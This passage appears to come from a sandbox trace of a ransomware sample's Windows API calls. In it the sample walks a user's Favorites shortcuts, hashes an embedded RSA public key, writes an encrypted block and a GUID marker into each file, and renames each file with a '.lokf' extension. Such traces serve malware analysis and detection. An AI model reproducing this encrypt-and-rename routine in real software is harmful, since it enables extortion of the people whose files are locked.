0x3268798 [0059.685] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.lokf")) returned 1 [0059.686] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0059.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0059.686] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0059.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.686] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.686] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.689] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.689] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.690] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.690] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.690] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.690] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.690] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0059.690] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.690] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.691] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.691] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.691] GetLastError () returned 0x0 [0059.691] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.691] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0059.691] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.691] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.691] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.691] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.691] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.691] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.691] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.692] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.692] CloseHandle (hObject=0x5cc) returned 1 [0059.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0059.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0059.692] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.lokf")) returned 1 [0059.694] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0059.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0059.694] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0059.694] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.694] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.694] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.696] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.696] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.697] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.697] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0059.698] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.698] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.698] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.698] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.698] GetLastError () returned 0x0 [0059.698] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.698] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0059.698] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.698] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.698] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.698] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.699] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.699] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.699] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.699] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.699] CloseHandle (hObject=0x5cc) returned 1 [0059.700] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0059.700] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0059.700] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.lokf")) returned 1 [0059.701] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0059.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0059.701] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0059.701] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.702] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=134) returned 1 [0059.702] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.704] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.704] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.705] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x86, lpOverlapped=0x0) returned 1 [0059.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.705] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0059.706] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.706] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.706] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.706] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.706] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.706] GetLastError () returned 0x0 [0059.706] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.706] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0059.706] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.706] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.706] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.706] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.706] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.707] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.707] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.707] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.707] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.707] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.707] CloseHandle (hObject=0x5cc) returned 1 [0059.708] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0059.708] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0059.708] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.lokf")) returned 1 [0059.709] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0059.709] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.709] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.709] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.709] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.709] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269928 [0059.709] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.709] 